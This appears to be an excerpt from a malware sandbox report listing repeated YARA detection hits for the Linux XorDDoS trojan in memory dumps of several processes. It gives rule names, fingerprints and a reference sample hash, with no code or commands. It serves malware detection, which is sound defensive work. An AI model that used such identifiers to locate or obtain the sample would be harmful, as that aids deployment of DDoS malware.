Source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
